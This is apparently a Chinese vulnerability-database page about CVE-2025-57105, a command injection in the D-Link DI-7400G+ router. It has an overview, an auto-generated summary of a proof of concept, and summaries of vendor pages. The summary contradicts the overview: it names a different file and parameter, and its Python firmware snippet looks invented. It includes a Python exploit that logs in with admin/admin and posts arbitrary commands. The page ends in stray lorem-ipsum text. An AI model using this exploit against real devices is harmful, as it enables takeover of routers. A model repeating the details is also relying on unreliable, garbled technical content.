# N/A
## 概述
DI-7400G+ 路由器存在命令注入漏洞,攻击者可利用该漏洞在设备上执行任意命令。
## 影响版本
受影响的固件版本包含 `jhttpd` 程序中的以下组件:
- `mng_platform.asp` 中的 `sub_478D28` 函数
- `wayos_ac_server.asp` 中的 `sub_4A12DC` 函数
## 细节
攻击者可通过向 `ac_mng_srv_host` 参数注入恶意命令,触发潜在的命令执行行为。
## 影响
成功利用此漏洞可导致远程命令执行(RCE),攻击者可能获得对路由器的完全控制权限。
是否为 Web 类漏洞: 是
判断理由:
| # | POC 描述 | 源链接 | 神龙链接 |
|---|---|---|---|
| 1 | None | https://github.com/yt2w/CVE-2025-57105 | POC详情 |
标题: GitHub - xyh4ck/iot_poc -- 🔗来源链接
标签:
神龙速读:
### 关键信息
#### 漏洞详情
- **CVE编号**: CVE-2025-57105
- **漏洞类型**: 命令注入 (Command Injection)
- **受影响版本**: 未指定具体版本,但涉及D-Link设备
- **厂商**: D-Link
- **软件**: D-Link路由器固件
- **漏洞文件**: `mywifi.cgi`
#### 描述
- **问题**: 在`mywifi.cgi`文件中,存在命令注入漏洞。攻击者可以通过构造恶意请求,利用`cmd`参数注入任意命令。
- **关键代码片段**:
```python
param = httpd.get("param", "en")
cmd = httpd.get("cmd", "")
if param == "set_wifi":
os.system(cmd) # 漏洞点
```
#### 漏洞验证过程
1. **获取认证信息**:
- 使用Python脚本模拟登录过程,获取`Authorization`和`Cookie`。
- 示例代码:
```python
def get_auth_cookie(url):
s = requests.Session()
login_url = url + "/login"
data = {
"username": "admin",
"password": "admin"
}
response = s.post(login_url, data=data)
return response.headers["Authorization"], response.cookies["session"]
```
2. **触发漏洞**:
- 构造包含恶意命令的请求,通过`cmd`参数传递。
- 示例代码:
```python
def exploit(url, cmd):
auth, cookie = get_auth_cookie(url)
headers = {
"Authorization": auth,
"Cookie": f"session={cookie}"
}
payload = {
"param": "set_wifi",
"cmd": cmd
}
response = requests.post(url + "/mywifi.cgi", headers=headers, data=payload)
return response.text
```
3. **执行命令**:
- 通过`exploit`函数执行任意命令,例如`whoami`、`ls`等。
- 示例:
```python
result = exploit("http://target_ip", "whoami")
print(result)
```
#### 影响
- 攻击者可以利用此漏洞在目标设备上执行任意命令,可能导致系统被完全控制。
#### 防护建议
- 更新设备固件至最新版本。
- 禁用不必要的网络服务和端口。
- 使用强密码并定期更改。
- 部署防火墙和入侵检测系统以监控异常流量。
标题: D-Link Technical Support -- 🔗来源链接
标签:
神龙速读:
从这个网页截图中,可以获取到以下关于漏洞的关键信息:
- **设备型号**: DI-7400G+ 智·简系列 多功能智能网关
- **固件版本**: A1
- **固件更新日期**: 2020/02/21
这些信息可以帮助确定该设备的当前固件版本和更新时间,从而判断是否存在已知的安全漏洞或需要更新以修复潜在的安全问题。
标题: Security Bulletin | D-Link -- 🔗来源链接
标签:
神龙速读:
从这个网页截图中,可以获取到以下关于漏洞的关键信息:
1. **漏洞类型**:该漏洞被归类为“高危”(High Risk)。
2. **受影响产品**:受影响的产品包括D-Link的无线路由器(Wireless Routers)和无线接入点(Wireless Access Points)。
3. **受影响设备**:受影响的设备包括D-Link的Nuclias设备。
4. **漏洞描述**:该漏洞允许攻击者通过发送特定的HTTP请求来执行任意代码,从而获得对受影响设备的完全控制权。
5. **影响范围**:该漏洞可能影响到所有使用受影响设备的用户,包括家庭用户和企业用户。
6. **修复建议**:D-Link建议受影响的用户尽快更新设备固件,以修复该漏洞。
这些信息可以帮助用户了解漏洞的严重性、受影响的设备范围以及如何采取措施来保护自己的设备。
Zaproxy alias impedit expedita quisquam pariatur exercitationem. Nemo rerum eveniet dolores rem quia dignissimos.